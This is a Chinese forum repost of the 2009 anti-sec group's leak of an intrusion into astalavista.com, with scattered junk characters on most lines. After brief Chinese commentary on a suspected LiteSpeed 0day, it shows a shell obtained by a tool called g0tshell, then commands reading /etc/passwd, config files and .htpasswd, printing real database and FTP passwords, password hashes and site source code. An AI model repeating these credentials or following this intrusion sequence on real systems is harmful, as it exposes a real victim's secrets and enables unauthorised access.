里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
2 W+ U; I) h- _' U, n% N
- }* H" B5 r8 N- @$ l1 W[root@front3 ~]# curl -I litespeedtech.com
6 Q3 O6 i- `# q$ y5 YHTTP/1.1 200 OK
: h/ e( W! ^1 p0 y( D, sDate: Fri, 05 Jun 2009 22:54:51 GMT4 @- r# k* z' W! R
Server: LiteSpeed. A3 t Z& a/ J% N
( |. W* C' }) _
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-* y$ D6 @: @" Y3 i6 Z
: R! [! q9 X% }有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。0 C, C3 O; V2 K, n
7 W# p% \3 M( Q" Z. O" L/ \
7 `& j% m7 o; T& R/ k( ?5 i/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ : I# U% ]! A# ]5 }# c5 J
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \' W5 q1 i9 a# o2 f$ O
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \& F1 }* {$ t; Z
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /& l1 q# q/ R/ J
\/ \/ \/ \/ \/ \/ \/
9 @3 Z' r, h9 s8 ^' x& Z The Hacking & Security Community
' @' c$ h# T+ V: D2 y[+] Founded in 1997 by a hacker computer enthusiast* g6 ]4 v8 m- l. d# K
[-] Exposed in 2009 by anti-sec group
* K$ m$ y; P- W- i% H1 F
: I4 b6 F/ t4 _1 b* hFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:$ {8 [) c5 l3 J
>> 03. Who’s behind the site?1 J P- L8 { h, p
>>* n; _$ }& x7 J. Q7 z
>> A team of security and IT professionals, and a countless number of contributors from all over the world.) \$ N: u$ R m6 \8 h
( C4 A# g9 f' k: ? l>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
1 {, ~9 _, Z( g2 O>>& x! U3 D% E# m/ M1 [9 R( _
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
9 V& m5 `. X( _" l Vmilitary institutions.1 m% R2 ~3 g. W4 C$ d$ {# g
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
) B- p% c4 k/ A- g# i( n+ {6 b( J
; ?, U) n, P$ u( V; T( u% P& y) bWhy has Astalavista been targeted?
' [: c; k9 Q6 e) K6 y0 _( V! L$ i6 G a o
Other than the fact that they are not doing any of this for the “community” but" o9 R. |, T# y& f
for the money, they spread exploits for kids, claim to be a security community
. X/ K6 z6 b: y(with no real sense of security on their own servers), and they charge you $6.66
' Q& c) k* i: \( Q) Cper months to access a dead forum with a directory filled with public releases
7 I) J1 [* g$ [! X6 }7 o8 ]% e* Dand outdated / broken services.& q* I9 [( D6 a& |
- m2 H4 j# z8 ?0 _& d
We wanted to see how good that “team of security and IT professionals” really is.
, h& A7 _2 \# z+ h4 K8 g) R+ O4 x9 O+ Y7 \3 `4 g* Z8 `
Let’s begin.' |4 R% S5 b) j0 H6 P: {4 R k5 V
: N# r0 I* T9 }8 s/ g9 Z
anti-sec:~# ./g0tshell astalavista.com -p 80
# k' [; {9 ?- j+ B0 V[+] Connecting to astalavista.com:80
4 Y( w) L) ^/ _3 ?& F. J6 G[+] Grabbing banner…
. d! c' [2 s' Y- h( R6 `8 d8 }) @LiteSpeed9 r: q. x6 V! w0 T. H+ I
[+] Injecting shellcode…! r/ B: i' V- ^& z6 |+ O
[-] Wait for it
) |7 Z3 Y% l: a% F- g ^5 n! Q3 W \/ D
[~] We g0tshell
6 H, K2 ~9 c* V( a# N3 ^uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux: K5 u0 U' n& c5 e1 E( U7 P
ID: uid=100(apache) gid=500(apache) groups=500(apache)
1 Q i9 R( L4 ^0 F
2 ]3 M u: ^6 e! R+ i2 _sh-3.2$ cat /etc/passwd" R' [; y) C( I
root:x:0:0:root:/root:/bin/bash4 m1 H- T! g+ w7 z! j
bin:x:1:1:bin:/bin:/sbin/nologin6 [# U. v* J! {* V" [
daemon:x:2:2:daemon:/sbin:/sbin/nologin
1 y9 A# z1 `& e1 x, ?adm:x:3:4:adm:/var/adm:/sbin/nologin) J$ J7 K0 Y+ u; ]/ i
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
! Q& @# S. a g }" Y* ~sync:x:5:0:sync:/sbin:/bin/sync
# L1 c) C# I# t8 Q! f" }shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+ o7 g/ q3 |. B- Nhalt:x:7:0:halt:/sbin:/sbin/halt
. ^; _" O* {8 @8 G: q$ Y& _) K+ l' e7 qmail:x:8:12:mail:/var/spool/mail:/sbin/nologin+ y: n1 U( c a6 Q( I
news:x:9:13:news:/etc/news:( P& a+ B+ Q5 H
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin# Z$ ~+ d* [1 p# ?
operator:x:11:0 perator:/root:/sbin/nologin
8 p* G+ c# |) F+ [1 J& L& M- pgames:x:12:100:games:/usr/games:/sbin/nologin
: X, I/ c9 u* n* Bgopher:x:13:30:gopher:/var/gopher:/sbin/nologin5 @ q% I$ r |7 |. i+ l+ e9 F
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin2 C/ d: W% z+ y- g4 Q% g- }
nobody:x:99:99:Nobody:/:/sbin/nologin
, x3 c0 C2 Z$ [+ Vrpm:x:37:37::/var/lib/rpm:/sbin/nologin
9 D; D/ y2 e2 F* H1 Q* Edbus:x:81:81:System message bus:/:/sbin/nologin7 P0 N* T% W& l4 ^4 m: Z
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
$ K& o4 N/ H5 O1 Ymailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- @/ P! _" ^6 U! \smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin5 M( I$ a1 @4 A+ c0 f
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin% _! L3 T5 o' S: Q7 ?: I7 p5 d
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
2 V1 ]$ c' p/ T7 {$ e9 `' S0 p, A6 Trpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
6 L: u" F) _ t9 t! K7 e5 {rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin4 M* } v8 j# X8 ~% N+ g
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin9 E2 k; M C U6 M& ^! l& _9 P" b
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
/ S* R8 P0 w- n# \; S+ Jpcap:x:77:77::/var/arpwatch:/sbin/nologin
8 Q6 ^) O Q! z$ [& S, w; Dnamed:x:25:25:Named:/var/named:/sbin/nologin) q" P) L& p% x& e. X7 ?
apache:x:100:500::/var/www:/bin/false( l3 }; \0 p7 W0 G% {; j" U7 D
diradmin:x:101:101::/usr/local/directadmin:/bin/bash4 [/ [1 z5 x5 _) ]* V
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
; g9 P6 x! S; `6 F7 Bwebapps:x:500:501::/var/www/html:/bin/bash
0 l5 \* S) r6 r, Y, u$ tmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash8 _( g& K" H- S) z, A: ?
admin:x:501:502::/home/admin:/bin/bash
+ \/ e8 C- i" m. B* g F/ }/ P ?jon:x:502:503::/home/jon:/bin/bash; j+ {1 X' ]$ q L4 U
com:x:503:504::/home/com:/bin/bash
1 e2 d( `+ B4 K: Y4 ]ntp:x:38:38::/etc/ntp:/sbin/nologin
0 \: H5 h- ]/ kais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin6 E; Q: i: a7 r E/ Z& E, ^
astanet:x:504:505::/home/astanet:/bin/bash
( R! g& C( R2 y" Kavahi:x:70:70:Avahi daemon:/:/sbin/nologin+ D' g& `+ u3 R' l
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin; [( {5 Z3 O$ `$ A# K
; [0 ^2 G1 k) Q
sh-3.2$ cat /etc/hosts
8 K2 T7 ?6 | L# Do not remove the following line, or various programs
8 S W; A; H+ p1 ?; e) a# that require network functionality will fail./ p$ v1 X9 s; X# p/ F
127.0.0.1 localhost.localdomain localhost
9 Q2 g3 s: u6 {. U- u; C8 P::1 localhost6.localdomain6 localhost6
: d2 f/ U! b1 u3 ^: _2 P( E80.74.154.172 asta1.astalavistaserver.com% ]& n3 |; r7 ?) b" v
% u- d9 e1 `# c2 J k: X) ^+ ?6 T
sh-3.2$ pwd8 |1 E' j+ r( g7 n' n8 R K
/home/com/public_html# T. N0 V f, l3 I
; i. u7 S9 x" i. j+ U
sh-3.2$ ls -la
, v5 K* l3 _8 u) Ytotal 18460
s2 m3 G' K/ A& P6 y# }% K' Qdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
/ b2 r- ]/ `2 J/ ~: s2 Ldrwx–x–x 11 com com 4096 Jun 25 2008 ..5 k, F) @4 c3 B7 h/ y' {
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin ~1 w4 v* d, f0 {$ @# R, l
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache) N& g4 M7 Y" X4 v U! ^3 O0 G+ W
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
2 ^7 D' v" z7 y# J7 @drwxrwxrwx 2 com com 4096 May 19 00:50 config2 F" _! B( j9 l
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core1 T2 ]* w2 {* y
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules/ c4 r/ w: i) X4 s$ i! Q
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing2 v6 \! }) q( e$ {. Z5 _/ [
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo" c2 h y6 R" J
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
6 x$ j6 e/ d z" T; e# c& U! e-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
' m! ?# Y$ Q: q) ldrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
5 K* h8 h [+ ?0 S4 q1 Q4 xdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor z1 H+ N1 E K3 f d5 \' r9 q
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
5 Y7 |1 \4 ]" fdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed" M5 [9 R- `# F2 a6 v/ b
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess9 T/ ^- \0 W* w3 v
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak6 e8 J! q. R8 K' C3 W( S
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak b: `$ k5 ? u
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
( }5 y7 {$ k8 p7 Y+ q6 ~$ Odrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
- w# b8 R4 O/ O+ a-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php, g. u8 ^5 j8 k# k! J
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer Q- `- y- B9 E, T. `
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
+ O3 i) x% W) l% f8 K- j! rdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib' E) `' e1 Y) S5 ^6 `
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media) @" o& [! ]) t4 _* U3 {# P
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
: i& L0 S* @3 ]$ j( ]drwxr-xr-x 34 com com 4096 May 28 16:30 modules
8 F* _% T2 V' Z" z9 A2 H# ^drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
* T$ w0 }, r3 Y" `& }drwxrwxr-x 22 com com 4096 May 28 17:06 _new! [5 s& d( v* }
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
. m5 R$ O( y2 H5 U. ?( U) Tdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy: p" m) w5 z5 C3 A$ b1 U( |$ x
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
/ b3 X2 E) v% U: p6 W! @' G" p5 @# k-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
, h: Z7 i$ M0 d$ }) s-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
' x/ L7 R6 Q; d* o0 G-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
, h; h6 a5 u$ d. vdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
) _1 M8 i& y# l, v; sdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
! k6 r& ?; v8 adrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
9 w' B1 t: W- n" c, q9 G9 p$ N/ \. e2 b7 ]5 a% S% M
sh-3.2$ head -20 index.php# G: o2 f$ {6 P4 j: n# M. ^
<?php( I5 f: m; N9 ^6 A
2 }- e, g) Z1 N d5 B
/**
1 ~! f& C( n5 F3 P g& Z* The main page for the CMS
0 _7 N" ]; t5 A- v* @copyright CONTREXX CMS - COMVATION AG
, h/ { m' e+ r& w* @author Comvation Development Team! L5 Z& Z3 R. i% c# m& G3 ]
* @version v1.0.9.10.1 stable
6 N1 K s6 _- D) a. u, O4 K* @package contrexx; d, h8 I4 k D- O
* @subpackage core( i l, i; X* M) T
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
8 K7 m: A+ n* q; Q* @since v0.0.0.02 a3 l# b4 e( j6 U1 b+ ~
* @todo Capitalize all class names in project
! O0 ^5 l' Q& r- F* @uses /config/configuration.php
& {, c$ |4 c& }* @uses /config/settings.php' L& Z$ q) w" U E( \
* @uses /config/version.php
- X3 Q" U) h4 @* S* @uses /core/API.php0 i; |6 g0 e9 w8 D1 I& _4 H" g
* @uses /core_modules/cache/index.class.php3 x- Q/ ~. B3 E: K \* E
* @uses /core/error.class.php! X* D2 b) c- C
* @uses /core_modules/banner/index.class.php
, P1 a8 j" u" f# Z1 {" D* O1 ]* @uses /core_modules/contact/index.class.php/ F& d+ d T7 R+ R
4 y: Q2 B6 j/ f) B
sh-3.2$ cd config/
5 R0 K3 \; I& w; F8 Q2 Ish-3.2$ ls -la5 D. T, g/ N) d3 ?! Z
total 32
) q$ p( g8 o9 L! K/ e9 fdrwxrwxrwx 2 com com 4096 May 19 00:50 .
2 O& P1 F9 T7 k/ k3 Edrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+ }+ Z- D6 E$ V/ Z, V& [8 B. O-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
; V% g5 b U5 w# l$ c-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php/ Y' f4 v5 z5 Y9 O% d1 t% c
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
/ c/ Q. u; C$ N/ i-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
7 D$ b- C0 m) e
7 v$ Q7 k% @. ^: csh-3.2$ cat configuration.php) e! t: l$ O/ ? ~, d5 M2 A7 Q- ^* G
[snip]# {+ q& p* T6 N. j5 @ ?( l
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
' y3 c ^! r1 B D$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
! L9 U% Q. k0 r+ o/ z* L: E$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix: y9 o# k0 z" X0 g
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username' h( B, w* r/ g. q+ I- u5 `
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
4 p. ]$ {+ e, W/ v! Q$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)9 }7 W6 y$ [5 m) O
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..), c( S4 s2 @ g1 _9 y7 w
[snip]% X2 Q" `7 U) c
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false6 p! e2 o3 A G/ J( ^. S
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
; d% N6 ^# j9 X0 y9 ^* b3 d* K$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
: u/ e" d \9 U) @; z' x$_FTPCONFIG['port'] = 21; // Ftp remote port- v0 t. s+ @: y* S1 W" A
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username/ R2 t7 c% s! E6 r& N) ~* a
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
5 w, P4 F1 N& f# h0 K* V; ^$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
: l6 g. s9 f- r6 |5 b
6 n1 q4 K; c0 ~8 t1 }1 lsh-3.2$ cd ..
& d; v# _+ W" n6 i7 X2 X/ M) L9 Hsh-3.2$ cd dvd/
0 E4 u+ X$ V E* @9 [sh-3.2$ ls -la
$ u ]! W( O+ f+ |# Utotal 29137806 B- ^& p0 b: U9 @; w
drwxr-xr-x 2 com com 4096 Sep 9 2008 .5 n: j# s9 e2 E4 V6 ]% V
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+ v8 |% I& i4 y4 X-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar4 ^4 }5 Z1 a) P9 s: o) B
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar. p/ X( z& f1 U& \6 h' c& |
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
6 h" A5 `; \* S-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
5 {5 ^: ]! t* n' }6 W1 b/ x E4 B6 [# ~3 v$ p* v. x ]
sh-3.2$ cat .htaccess
# }0 R& F( B1 w* q c( LauthType Basic- \; N: v) X+ f0 @
authName DVD0 ]- |) `' e1 V
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd* u4 w4 ~" ^( D# ^) p, W7 ?
require valid-user) f0 i1 M4 l8 A2 z
2 p+ h, P3 T4 G/ T/ ~sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd0 n3 I4 H4 @$ d. M; T; S
DVDdownload:CRD8cuY6.MPT6! Q* c, z5 m8 r% A2 ^
DVDdownload2:CR8a36.wluFMg
: P" j* q/ j# {7 k# e% }5 a' \; d8 h! L% A0 S! x
sh-3.2$ cat test.php
* V8 C) {- I/ C' J& {) w6 B" ~<?php( l& A+ |6 I" k' {' N& K1 W
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
1 M0 x: @/ x7 ^' C, r$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));* J6 J5 j1 M5 q1 C1 a
echo $url;
# J6 b& ~9 H n" q% }9 L?>
: j$ @; D( k8 @! _
; g7 X$ o% e4 Esh-3.2$ cd modifications/
7 _6 H$ Z( j8 z6 Ysh-3.2$ ls -la! W( c& ~; y0 \+ N7 X
total 32% F/ G5 Y! O' X7 f( C
drwxr-xr-x 8 com com 4096 May 11 12:48 .. f7 p" b! b, Q) A7 R2 _
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..- z/ _* r& l4 [. X) H* `
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng3 d8 ^; l M7 o0 O
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
- q, M% s+ |/ Gdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
5 G/ o7 }6 ?7 _" t& p" Z2 udrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
: \8 ?, K* v" _6 K% ^3 x' H$ Jdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
. u# Z5 u { [- h! o4 Edrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp& R4 ]# T+ {+ Q/ U# ?
* A- w- _# d( ]- N* Q1 }2 z' }, ]! p
sh-3.2$ ls -R
3 O6 o+ ^7 \5 L/ {1 x+ k.:
$ t( Y# P% f# B" \com_avtng cronjobs onlinetools pjirc search _tmp; l& J" l& \- N8 j0 h% e
. ?+ e( l7 b7 S% f9 R( }8 o
./com_avtng:7 D6 c( ^6 D8 c, S [6 }7 l
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts- Y$ b% ?5 f7 r( x6 s" I* ~# Z
+ ~. h- g. \, t./com_avtng/scripts:5 b" Q# h/ e/ Z+ l: L1 d
popunder.js$ x i) w7 A, n7 C. r2 A3 C3 k
4 h% V4 g* {2 J% v) b./cronjobs:
& W) b$ g( Y, |& s* W3 F( Jexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp% e$ M3 W0 f6 G" H+ l* H8 d/ Y
- a5 |+ R7 z+ n' v1 F./cronjobs/tmp:
! d1 C6 T& \, m' a! b1 c, lcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv: ]% n* y* G! V( k# N. ]8 J9 X7 J9 T
# {! o4 ~! @5 c& p2 h; o1 k./onlinetools:
* [9 }1 P6 o( W4 f% h# r/ Mindex.php
) ^7 Q% e# z: i5 Y: M" U3 Y6 a* c6 U3 A, N
./pjirc:
% ~# ?/ b- Q7 G2 aa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt' p/ N4 C- d$ {) D* R
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt' r/ g1 T% Q7 B; m. U( u
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd& ?3 ]9 ]2 V3 c, S' B
5 ~4 x- v3 O$ w./pjirc/img:
: h: i O+ c- j+ o4 `ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
0 h& e% R* u' xarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif : j! a S9 a# s8 ^) N, x0 d, Y8 G( M
verre-eau.gif9 F8 s3 R4 F8 y- T
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
^; p1 E# ?3 f. i2 T( ?1 Gverre-vin.gif
" Q ~$ T$ E* W: `( Sballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif* A: e: x& Q8 _' H! m- @$ q
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif/ w0 N- {* ?+ o3 f7 l6 y
+ z4 ~ y0 a% f4 s8 R2 Y$ D) h5 r./pjirc/snd:
, h! M, W+ L ^3 Ebell2.au ding.au
; M3 S% Y7 a1 Y! K* a" ?/ z8 P8 J; Y2 J+ A/ A% J
./search:
6 j, `5 W/ F4 j! u) esearchEngines.php search.php
0 L# N) u% C5 v+ d2 [4 }, z4 g( f
4 E+ `! p8 {% y% p7 V./_tmp:
; L* N0 D0 G( Y5 }$ {7 y0 LdefaultPorts.php defaultPorts.txt2 @% G# h* B6 k6 O: I
L+ N( \2 F5 f# Csh-3.2$ cd cronjobs/
( |1 [( _1 `. L8 @& Hsh-3.2$ cat exploits.php
' y; y O; e7 f2 Y9 b6 [' f& Y[snip]
, \- A6 K+ [' [! Z. m# Z2 Q4 @$categories = array();
" [. J1 X5 @- _$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;" ?/ K! D+ ?8 I
$expolits = file($milw0rmFile);) k1 F; j, S" S" Z2 a) h
$comExploits = array();
- `' }: w. V6 U3 N2 `7 h2 B[snip]# O/ x2 i: q |8 P X+ u7 C
// manage data
$ H# s: H; [; ?for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640' G+ p3 ?0 y4 P8 E/ X( B
F/ h$ U4 a8 W) f1 s% u& `
// get path and title
& d$ V9 E) q) f $expolits[$x] = trim($expolits[$x]);4 I. Q0 ~5 p" H6 `" ]
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));, l Z# G- k7 _$ g! O1 b/ k
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
$ _) D( I1 ~; H I/ C0 C* x. _0 U }& o* S
// check if file exists [8 r6 P; P& T1 b3 Q; `
if (file_exists($path)) {
% n7 F7 \" {" h" o" m& X3 S; B
" ?/ U4 C+ g' r. F2 ` $text = file_get_contents($path);
5 I7 O1 V' i4 r5 ` O+ V9 B* w4 t* z
( Y \* M3 a3 H# C // get content and date
/ O6 ] p7 b/ S' j( ~' H l //$text = htmlspecialchars($text, ENT_QUOTES);
6 s9 D) S. n; Y) W. | $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));+ m0 P4 Q9 _0 ~* Q. F
if ($tmptext != ”) {+ n3 {. A! ]: ~ |- M; m: }
$text = $tmptext;
1 a0 X) o# F" j1 P% y( e% L } else {: i9 ~+ `( i! r5 I0 v# z% u
$text = addslashes(htmlentities($text, ENT_QUOTES));
8 l ?9 a& j6 I }
+ v/ t: o- |3 C. @$ F $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
5 a# P; c+ N# w" F9 N $tmp = explode('-', $date);8 w! \! ^/ }% n% x& R% u
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));7 f' }% V2 g' B
$cat = getCategory ($path);% Q: H/ f3 F) G7 y
$ext = pathinfo(basename($path));
9 g: t8 z0 d9 j! e0 w: ? $ext = $ext['extension'];
' m% m1 m8 X& ?3 P+ j9 L $qStr = ”" [- j) }' _- L C% D3 |' ]
SELECT `id`% [9 C# b/ r: U) f! |1 s6 ~4 f, ^
FROM `contrexx_module_exploits`" k. |7 |3 N# \0 G W
WHERE `title` = ‘” . $title . “‘, K+ C R/ S9 ^: Q3 I% q
AND `date` = ‘” . $date . “‘0 U# N) x( G- A' O S R+ D7 b* G
“;
6 o- }1 x' J6 r$ m+ ` echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;6 q' \; P- ^( F: c* E
$q = $_objDB->query($qStr);
8 F+ {6 a. q# Z& D. p m# [, C$ j/ k2 v3 s- r4 j9 x0 a/ C3 i
if ($q->numRows() == 0) {" c1 T5 c, _" @% ~
1 U5 M. d! |+ e- C; r6 z // prepare array
( j/ i+ P, g/ I7 d $comExploits[$x]['date'] = $date;
9 W6 O, @5 \) {2 X g% D $comExploits[$x]['title'] = $title;
; B) L/ ^5 N' G8 w3 e# |1 K# _ $comExploits[$x]['author'] = ‘milw0rm’;
; l8 h E! K$ d# ^- B $comExploits[$x]['text'] = $text;
+ w* {% G9 ?. p; I) u( W $comExploits[$x]['source'] = $ext;% t! S) k, r" R1 u; T
$comExploits[$x]['url1'] = ”;
+ s) {# U# Q; n9 c! T4 v- D; z $comExploits[$x]['url2'] = ”;' L+ K3 n. i' }5 i( \, b; b- d
$comExploits[$x]['catid'] = $cat;
5 l! r5 P! F, H6 k% J0 R $comExploits[$x]['lang'] = ‘2′;' E& Q. c2 y( _
$comExploits[$x]['userid'] = ‘12′;
! e+ b" J' U/ }7 c1 H $comExploits[$x]['startdate'] = ‘0000-00-00′;
( d1 {, p4 _" s8 u $comExploits[$x]['enddate'] = ‘0000-00-00′;) m! n6 q9 x h( U! e) R
$comExploits[$x]['status'] = ‘1′;8 H/ B# l7 d/ _/ N
$comExploits[$x]['changelog'] = $date;4 e4 E. Q# ~" Q+ ~. Y) C# J
' z% r% l! P1 w! o+ A } I' q }4 c0 u F+ P' ?4 B
[snip]" S. q5 @3 i) X9 b, I
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
5 A% {, y- u& k<rss version=”2.0″>
: t+ i6 ]) X; `3 O3 I <channel>3 ~7 X% n/ _5 h. m: C
<title>ASTALAVISTA.com - Exploits</title>
6 N/ D" E# s0 }& r) p/ _) M. k <link>http://www.astalavista.com/exploits</link>
& y1 D/ a2 w1 J, r- t+ i <description>All availably Exploits.</description>
0 f! e1 p0 P7 s2 @, A; ?# @ <language>en-us</language>- X R/ ^# T1 R( e2 L7 H% ]
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate># n; U2 X- z6 }8 B- E% P; c
